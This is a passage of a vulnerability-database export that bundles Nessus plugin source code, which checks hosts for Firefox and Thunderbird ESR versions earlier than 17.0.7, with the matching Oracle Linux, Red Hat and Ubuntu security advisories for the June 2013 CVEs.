to these updated packages, which\ncontain Firefox version 17.0.7 ESR, which corrects these issues. After\ninstalling the update, Firefox must be restarted for the changes to\ntake effect.\"\n );\n # http://www.mozilla.org/security/known-vulnerabilities/firefoxESR.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a134523f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0981\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1694\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1684\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1690\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1687\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xulrunner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xulrunner-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xulrunner-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0981\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"firefox-17.0.7-1.el5_9\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"firefox-debuginfo-17.0.7-1.el5_9\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"xulrunner-17.0.7-1.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"xulrunner-debuginfo-17.0.7-1.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"xulrunner-devel-17.0.7-1.el5_9\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"firefox-17.0.7-1.el6_4\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"firefox-debuginfo-17.0.7-1.el6_4\", allowmaj:TRUE)) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"xulrunner-17.0.7-1.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"xulrunner-debuginfo-17.0.7-1.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"xulrunner-devel-17.0.7-1.el6_4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo / xulrunner / xulrunner-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T03:44:26", "description": "The installed version of Firefox ESR 17.x is earlier than 17.0.7 and\nis, therefore, potentially affected by the following vulnerabilities :\n\n - Various, unspecified memory safety issues exist.\n (CVE-2013-1682)\n\n - Heap-use-after-free errors exist related to\n 'LookupMediaElementURITable',\n 'nsIDocument::GetRootElement' and 'mozilla::ResetDir'.\n (CVE-2013-1684, CVE-2013-1685, CVE-2013-1686)\n\n - An error exists related to 'XBL scope', 'System Only\n Wrappers' (SOW) and chrome-privileged pages that could\n allow cross-site scripting attacks. (CVE-2013-1687)\n\n - An error related to 'onreadystatechange' and unmapped\n memory could cause application crashes and allow\n arbitrary code execution. (CVE-2013-1690)\n\n - The application sends data in the body of XMLHttpRequest\n (XHR) HEAD requests and could aid in cross-site request\n forgery attacks. (CVE-2013-1692)\n\n - An error related to the processing of SVG content could\n allow a timing attack to disclose information across\n domains. (CVE-2013-1693)\n\n - An error exists related to 'PreserveWrapper' and the\n 'preserved-wrapper' flag that could cause potentially\n exploitable application crashes. (CVE-2013-1694)\n\n - An error exists related to the 'toString' and 'valueOf'\n methods that could allow 'XrayWrappers' to be bypassed.\n (CVE-2013-1697)", "edition": 28, "published": "2013-06-26T00:00:00", "title": "Firefox ESR 17.x < 17.0.7 Multiple Vulnerabilities (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:mozilla:firefox_esr"], "id": "MACOSX_FIREFOX_17_0_7_ESR.NASL", "href": "https://www.tenable.com/plugins/nessus/66988", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66988);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\n \"CVE-2013-1682\",\n \"CVE-2013-1684\",\n \"CVE-2013-1685\",\n \"CVE-2013-1686\",\n \"CVE-2013-1687\",\n \"CVE-2013-1690\",\n \"CVE-2013-1692\",\n \"CVE-2013-1693\",\n \"CVE-2013-1694\",\n \"CVE-2013-1697\"\n );\n script_bugtraq_id(\n 60765,\n 60766,\n 60773,\n 60774,\n 60776,\n 60777,\n 60778,\n 60783,\n 60787\n );\n\n script_name(english:\"Firefox ESR 17.x < 17.0.7 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks version of Firefox\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is potentially\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Firefox ESR 17.x is earlier than 17.0.7 and\nis, therefore, potentially affected by the following vulnerabilities :\n\n - Various, unspecified memory safety issues exist.\n (CVE-2013-1682)\n\n - Heap-use-after-free errors exist related to\n 'LookupMediaElementURITable',\n 'nsIDocument::GetRootElement' and 'mozilla::ResetDir'.\n (CVE-2013-1684, CVE-2013-1685, CVE-2013-1686)\n\n - An error exists related to 'XBL scope', 'System Only\n Wrappers' (SOW) and chrome-privileged pages that could\n allow cross-site scripting attacks. (CVE-2013-1687)\n\n - An error related to 'onreadystatechange' and unmapped\n memory could cause application crashes and allow\n arbitrary code execution. (CVE-2013-1690)\n\n - The application sends data in the body of XMLHttpRequest\n (XHR) HEAD requests and could aid in cross-site request\n forgery attacks. (CVE-2013-1692)\n\n - An error related to the processing of SVG content could\n allow a timing attack to disclose information across\n domains. (CVE-2013-1693)\n\n - An error exists related to 'PreserveWrapper' and the\n 'preserved-wrapper' flag that could cause potentially\n exploitable application crashes. (CVE-2013-1694)\n\n - An error exists related to the 'toString' and 'valueOf'\n methods that could allow 'XrayWrappers' to be bypassed.\n (CVE-2013-1697)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-49/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-50/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-51/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-53/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-54/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-55/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-56/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-59/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Firefox 17.0.7 ESR or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1686\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox_esr\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_firefox_installed.nasl\");\n script_require_keys(\"MacOSX/Firefox/Installed\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nkb_base = \"MacOSX/Firefox\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\n\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\n\nis_esr = get_kb_item(kb_base+\"/is_esr\");\nif (isnull(is_esr)) audit(AUDIT_NOT_INST, \"Mozilla Firefox ESR\");\n\nmozilla_check_version(product:'firefox', version:version, path:path, esr:TRUE, fix:'17.0.7', min:'17.0', severity:SECURITY_HOLE, xss:TRUE, xsrf:TRUE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2020-10-22T17:05:55", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "[17.0.7-1.0.1.el6_4]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[17.0.7-1]\n- Update to 17.0.7 ESR", "edition": 5, "modified": "2013-06-25T00:00:00", "published": "2013-06-25T00:00:00", "id": "ELSA-2013-0982", "href": "http://linux.oracle.com/errata/ELSA-2013-0982.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:10", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "firefox\n[17.0.7-1.0.1.el6_4]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat ones\n[17.0.7-1]\n- Update to 17.0.7 ESR\nxulrunner\n[17.0.7-1.0.1.el6_4]\n- Replaced xulrunner-redhat-default-prefs.js with xulrunner-oracle-default-prefs.js\n- Removed XULRUNNER_VERSION from SOURCE21\n[17.0.7-1]\n- Update to 17.0.7 ESR\n[17.0.6-5]\n- Added workaround for rhbz#973721 - fixing problem with installation\n of some addons\n[17.0.6-4]\n- Added a workaround for rhbz#961687 - Prelink throws message\n 'Cannot safely convert .rel.dyn' section from REL to RELA'\n[17.0.6-3]\n- Added patch for aliasing issues (mozbz#821502)", "edition": 4, "modified": "2013-06-25T00:00:00", "published": "2013-06-25T00:00:00", "id": "ELSA-2013-0981", "href": "http://linux.oracle.com/errata/ELSA-2013-0981.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:29", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1682", "CVE-2013-1684", "CVE-2013-1685", "CVE-2013-1686", "CVE-2013-1687", "CVE-2013-1690", "CVE-2013-1692", "CVE-2013-1693", "CVE-2013-1694", "CVE-2013-1697"], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed content. Malicious\ncontent could cause Thunderbird to crash or, potentially, execute arbitrary\ncode with the privileges of the user running Thunderbird. (CVE-2013-1682,\nCVE-2013-1684, CVE-2013-1685, CVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Thunderbird allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Thunderbird processed SVG image files could\nallow an attacker to read data across domains, potentially leading to\ninformation disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Thunderbird implemented some of its\ninternal structures (called wrappers). An attacker could use these flaws to\nbypass some restrictions placed on them. This could lead to unexpected\nbehavior or a potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\nAbhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\nZbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\nNote: All of the above issues cannot be exploited by a specially-crafted\nHTML mail message as JavaScript is disabled by default for mail messages.\nThey could be exploited another way in Thunderbird, for example, when\nviewing the full remote content of an RSS feed.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 17.0.7 ESR, which corrects these issues. After\ninstalling the update, Thunderbird must be restarted for the changes to\ntake effect.\n", "modified": "2018-06-06T20:24:34", "published": "2013-06-25T04:00:00", "id": "RHSA-2013:0982", "href": "https://access.redhat.com/errata/RHSA-2013:0982", "type": "redhat", "title": "(RHSA-2013:0982) Important: thunderbird security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:10", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1682", "CVE-2013-1684", "CVE-2013-1685", "CVE-2013-1686", "CVE-2013-1687", "CVE-2013-1690", "CVE-2013-1692", "CVE-2013-1693", "CVE-2013-1694", "CVE-2013-1697"], "description": "Mozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685, CVE-2013-1686,\nCVE-2013-1687, CVE-2013-1690)\n\nIt was found that Firefox allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Firefox processed SVG image files could\nallow an attacker to read data across domains, potentially leading to\ninformation disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Firefox implemented some of its internal\nstructures (called wrappers). An attacker could use these flaws to bypass\nsome restrictions placed on them. This could lead to unexpected behavior or\na potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\nAbhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\nZbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 17.0.7 ESR. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 17.0.7 ESR, which corrects these issues. After installing\nthe update, Firefox must be restarted for the changes to take effect.\n", "modified": "2018-06-06T20:24:36", "published": "2013-06-25T04:00:00", "id": "RHSA-2013:0981", "href": "https://access.redhat.com/errata/RHSA-2013:0981", "type": "redhat", "title": "(RHSA-2013:0981) Critical: firefox security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:36:29", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "Multiple memory safety issues were discovered in Thunderbird. If the user \nwere tricked into opening a specially crafted message with scripting \nenabled, an attacker could possibly exploit these to cause a denial of \nservice via application crash, or potentially execute arbitrary code with \nthe privileges of the user invoking Thunderbird. (CVE-2013-1682)\n\nAbhishek Arya discovered multiple use-after-free bugs. If the user were \ntricked into opening a specially crafted message with scripting enabled, \nan attacker could possibly exploit these to execute arbitrary code with \nthe privileges of the user invoking Thunderbird. (CVE-2013-1684, \nCVE-2013-1685, CVE-2013-1686)\n\nMariusz Mlynski discovered that user defined code within the XBL scope of \nan element could be made to bypass System Only Wrappers (SOW). If a user \nhad scripting enabled, an attacker could potentially exploit this to \nexecute arbitrary code with the privileges of the user invoking \nThunderbird. (CVE-2013-1687)\n\nA crash was discovered when reloading a page that contained content using \nthe onreadystatechange event. If a user had scripting enabled, an attacker \ncould potentially exploit this to execute arbitrary code with the \nprivileges of the user invoking Thunderbird. (CVE-2013-1690)\n\nJohnathan Kuskos discovered that Thunderbird sent data in the body of \nXMLHttpRequest HEAD requests. If a user had scripting enabled, an attacker \ncould exploit this to conduct Cross-Site Request Forgery (CSRF) attacks. \n(CVE-2013-1692)\n\nPaul Stone discovered a timing flaw in the processing of SVG images with \nfilters. If a user had scripting enabled, an attacker could exploit this \nto view sensitive information. (CVE-2013-1693)\n\nBoris Zbarsky discovered a flaw in PreserveWrapper. If a user had \nscripting enabled, an attacker could potentially exploit this to cause \na denial of service via application crash, or execute code with the \nprivileges of the user invoking Thunderbird. (CVE-2013-1694)\n\nIt was discovered that XrayWrappers could be bypassed to call \ncontent-defined methods in certain circumstances. If a user had scripting \nenabled, an attacker could exploit this to cause undefined behaviour. \n(CVE-2013-1697)", "edition": 5, "modified": "2013-06-26T00:00:00", "published": "2013-06-26T00:00:00", "id": "USN-1891-1", "href": "https://ubuntu.com/security/notices/USN-1891-1", "title": "Thunderbird vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:43", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1696", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1695", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1688", "CVE-2013-1686", "CVE-2013-1698", "CVE-2013-1682", "CVE-2013-1683", "CVE-2013-1699", "CVE-2013-1693"], "description": "USN-1890-1 fixed vulnerabilities in Firefox. This update introduced a \nregression which sometimes resulted in Firefox using the wrong network \nproxy settings. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMultiple memory safety issues were discovered in Firefox. If the user were \ntricked into opening a specially crafted page, an attacker could possibly \nexploit these to cause a denial of service via application crash, or \npotentially execute arbitrary code with the privileges of the user invoking \nFirefox. (CVE-2013-1682, CVE-2013-1683)\n\nAbhishek Arya discovered multiple use-after-free bugs. If the user were \ntricked into opening a specially crafted page, an attacker could possibly \nexploit these to execute arbitrary code with the privileges of the user \ninvoking Firefox. (CVE-2013-1684, CVE-2013-1685, CVE-2013-1686)\n\nMariusz Mlynski discovered that user defined code within the XBL scope of \nan element could be made to bypass System Only Wrappers (SOW). An attacker \ncould potentially exploit this to execute arbitrary code with the \nprivileges of the user invoking Firefox. (CVE-2013-1687)\n\nMariusz Mlynski discovered that the profiler user interface incorrectly \nhandled data from the profiler. If the user examined profiler output \non a specially crafted page, an attacker could potentially exploit this to \nexecute arbitrary code with the privileges of the user invoking Firefox. \n(CVE-2013-1688)\n\nA crash was discovered when reloading a page that contained content using \nthe onreadystatechange event. An attacker could potentially exploit this \nto execute arbitrary code with the privileges of the user invoking Firefox \n(CVE-2013-1690)\n\nJohnathan Kuskos discovered that Firefox sent data in the body of \nXMLHttpRequest HEAD requests. An attacker could exploit this to conduct \nCross-Site Request Forgery (CSRF) attacks. (CVE-2013-1692)\n\nPaul Stone discovered a timing flaw in the processing of SVG images with \nfilters. An attacker could exploit this to view sensitive information. \n(CVE-2013-1693)\n\nBoris Zbarsky discovered a flaw in PreserveWrapper. An attacker could \npotentially exploit this to cause a denial of service via application \ncrash, or execute code with the privileges of the user invoking Firefox. \n(CVE-2013-1694)\n\nBob Owen discovered that a sandboxed iframe could use a frame element \nto bypass its own restrictions. (CVE-2013-1695)\n\nFr\u00e9d\u00e9ric Buclin discovered that the X-Frame-Options header is ignored \nin multi-part responses. An attacker could potentially exploit this \nto conduct clickjacking attacks. (CVE-2013-1696)\n\nIt was discovered that XrayWrappers could be bypassed to call \ncontent-defined methods in certain circumstances. An attacker could \nexploit this to cause undefined behaviour. (CVE-2013-1697)\n\nMatt Wobensmith discovered that the getUserMedia permission dialog \ndisplayed the wrong domain in certain circumstances. An attacker could \npotentially exploit this to trick the user in to giving a malicious \nsite access to their microphone or camera. (CVE-2013-1698)\n\nIt was discovered that the measures for preventing homograph attacks \nusing Internationalized Domain Names (IDN) were not sufficient \nfor certain Top Level Domains (TLD). An attacker could potentially \nexploit this to conduct URL spoofing and phishing attacks. \n(CVE-2013-1699)", "edition": 5, "modified": "2013-07-03T00:00:00", "published": "2013-07-03T00:00:00", "id": "USN-1890-2", "href": "https://ubuntu.com/security/notices/USN-1890-2", "title": "Firefox regression", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:33:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1696", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1695", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1688", "CVE-2013-1686", "CVE-2013-1698", "CVE-2013-1682", "CVE-2013-1683", "CVE-2013-1699", "CVE-2013-1693"], "description": "Multiple memory safety issues were discovered in Firefox. If the user were \ntricked into opening a specially crafted page, an attacker could possibly \nexploit these to cause a denial of service via application crash, or \npotentially execute arbitrary code with the privileges of the user invoking \nFirefox. (CVE-2013-1682, CVE-2013-1683)\n\nAbhishek Arya discovered multiple use-after-free bugs. If the user were \ntricked into opening a specially crafted page, an attacker could possibly \nexploit these to execute arbitrary code with the privileges of the user \ninvoking Firefox. (CVE-2013-1684, CVE-2013-1685, CVE-2013-1686)\n\nMariusz Mlynski discovered that user defined code within the XBL scope of \nan element could be made to bypass System Only Wrappers (SOW). An attacker \ncould potentially exploit this to execute arbitrary code with the \nprivileges of the user invoking Firefox. (CVE-2013-1687)\n\nMariusz Mlynski discovered that the profiler user interface incorrectly \nhandled data from the profiler. If the user examined profiler output \non a specially crafted page, an attacker could potentially exploit this to \nexecute arbitrary code with the privileges of the user invoking Firefox. \n(CVE-2013-1688)\n\nA crash was discovered when reloading a page that contained content using \nthe onreadystatechange event. An attacker could potentially exploit this \nto execute arbitrary code with the privileges of the user invoking Firefox \n(CVE-2013-1690)\n\nJohnathan Kuskos discovered that Firefox sent data in the body of \nXMLHttpRequest HEAD requests. An attacker could exploit this to conduct \nCross-Site Request Forgery (CSRF) attacks. (CVE-2013-1692)\n\nPaul Stone discovered a timing flaw in the processing of SVG images with \nfilters. An attacker could exploit this to view sensitive information. \n(CVE-2013-1693)\n\nBoris Zbarsky discovered a flaw in PreserveWrapper. An attacker could \npotentially exploit this to cause a denial of service via application \ncrash, or execute code with the privileges of the user invoking Firefox. \n(CVE-2013-1694)\n\nBob Owen discovered that a sandboxed iframe could use a frame element \nto bypass its own restrictions. (CVE-2013-1695)\n\nFr\u00e9d\u00e9ric Buclin discovered that the X-Frame-Options header is ignored \nin multi-part responses. An attacker could potentially exploit this \nto conduct clickjacking attacks. (CVE-2013-1696)\n\nIt was discovered that XrayWrappers could be bypassed to call \ncontent-defined methods in certain circumstances. An attacker could \nexploit this to cause undefined behaviour. (CVE-2013-1697)\n\nMatt Wobensmith discovered that the getUserMedia permission dialog \ndisplayed the wrong domain in certain circumstances. An attacker could \npotentially exploit this to trick the user in to giving a malicious \nsite access to their microphone or camera. (CVE-2013-1698)\n\nIt was discovered that the measures for preventing homograph attacks \nusing Internationalized Domain Names (IDN) were not sufficient \nfor certain Top Level Domains (TLD). An attacker could potentially \nexploit this to conduct URL spoofing and phishing attacks. \n(CVE-2013-1699)", "edition": 5, "modified": "2013-06-26T00:00:00", "published": 